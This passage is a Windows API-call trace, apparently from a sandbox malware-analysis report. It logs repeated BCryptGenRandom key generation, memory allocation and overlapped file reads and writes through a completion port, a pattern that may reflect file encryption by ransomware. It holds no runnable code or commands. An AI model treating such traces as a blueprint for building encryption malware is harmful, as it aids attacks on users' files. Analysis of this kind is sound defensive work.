lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.928] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0087.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0087.930] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0087.930] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0087.930] free (_Block=0x1ff1e60) [0087.930] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0087.930] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0087.930] free (_Block=0x1ff1e60) [0087.930] free (_Block=0x1ff1930) [0087.930] free (_Block=0x77d800) [0087.930] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.931] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.952] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x12cf, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.954] CloseHandle (hObject=0x3c4) returned 1 [0087.956] free (_Block=0x1fb18c0) [0087.956] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.968] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.969] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0087.969] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0087.970] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0087.970] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0087.970] free (_Block=0x1ff1e60) [0087.970] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0087.970] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0087.971] free (_Block=0x1ff1e60) [0087.971] free (_Block=0x1ff1930) [0087.971] free (_Block=0x77d800) [0087.971] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.971] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.971] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.972] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.991] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x12cf, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.992] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0087.993] CloseHandle (hObject=0x3c4) returned 1 [0088.169] free (_Block=0x1fb18c0) [0088.169] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0088.170] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.171] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0088.171] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.171] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0088.171] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0088.172] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0088.172] free (_Block=0x1ff1e60) [0088.172] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0088.172] calloc (_Count=0x82, _Size=0x4) returned 0x3db00b8 [0088.172] free (_Block=0x1ff1e60) [0088.172] free (_Block=0x3db00b8) [0088.172] free (_Block=0x77d800) [0088.172] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0088.172] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0088.176] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0088.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0088.207] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x296fa, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0088.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0088.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0088.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.218] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0088.218] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0088.218] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0088.218] free (_Block=0x77d800) [0088.218] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0088.218] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0088.218] free (_Block=0x1ff1930) [0088.218] free (_Block=0x1ff1a40) [0088.218] free (_Block=0x77d908) [0088.218] WriteFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0088.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0088.278] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x6d3c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0088.285] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0088.301] ReadFile (in: hFile=0x3c8, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0xee0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0088.301] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0088.310] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0088.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0088.315] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0088.315] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0088.315] free (_Block=0x77d800) [0088.315] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0088.315] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0088.315] free (_Block=0x2071f40) [0088.315] free (_Block=0x2072050) [0088.315] free (_Block=0x77d908) [0088.315] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0088.316] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0088.318] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.319] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0088.319] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.319] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0088.319] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0088.319] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0088.319] free (_Block=0x77d800) [0088.319] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0088.320] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0088.320] free (_Block=0x2071f40) [0088.320] free (_Block=0x2072050) [0088.320] free (_Block=0x77d908) [0088.320] WriteFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0088.320] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0088.321] CloseHandle (hObject=0x3c0) returned 1 [0088.321] free (_Block=0x3df0128) [0088.324] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0088.324] CloseHandle (hObject=0x3b8) returned 1 [0088.324] free (_Block=0x1ff1e60) [0088.324] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0088.330] WriteFile (in: hFile=0x3c4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0088.330] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0089.368] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0089.368] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0089.378] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0089.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0089.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0089.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0089.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0089.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0089.875] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0089.875] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0089.875] free (_Block=0x77d800) [0089.875] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0089.875] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0089.876] free (_Block=0x2071f40) [0089.876] free (_Block=0x2072050) [0089.876] free (_Block=0x77d908) [0089.876] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0089.975] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0090.011] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0090.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0090.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0090.013] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0090.013] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0090.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0090.014] calloc (_Count=0x40, _Size=0x4) returned 0x3db00b8 [0090.014] calloc (_Count=0x41, _Size=0x4) returned 0x3db01c0 [0090.014] free (_Block=0x3db00b8) [0090.014] calloc (_Count=0x41, _Size=0x4) returned 0x3db02d0 [0090.014] calloc (_Count=0x82, _Size=0x4) returned 0x3db03e0 [0090.014] free (_Block=0x3db02d0) [0090.014] free (_Block=0x3db03e0) [0090.014] free (_Block=0x3db01c0) [0090.014] WriteFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0090.015] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0090.021] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0090.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0090.025] WriteFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0090.027] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0090.887] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0090.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0090.895] CloseHandle (hObject=0x4b4) returned 1 [0090.896] free (_Block=0x3d70048) [0090.896] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.035] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0091.036] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.037] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0091.037] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0091.037] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0091.037] free (_Block=0x1ff1e60) [0091.038] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0091.038] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0091.038] free (_Block=0x1ff1e60) [0091.038] free (_Block=0x3db01c8) [0091.038] free (_Block=0x3db00b8) [0091.038] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.038] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.044] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.044] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.047] CloseHandle (hObject=0x4b4) returned 1 [0091.048] free (_Block=0x3d70048) [0091.048] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.064] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.066] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0091.066] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.068] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0091.068] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0091.068] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0091.068] free (_Block=0x1ff1e60) [0091.068] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0091.068] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0091.068] free (_Block=0x1ff1e60) [0091.068] free (_Block=0x3db01c8) [0091.068] free (_Block=0x3db00b8) [0091.069] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.069] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.078] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, 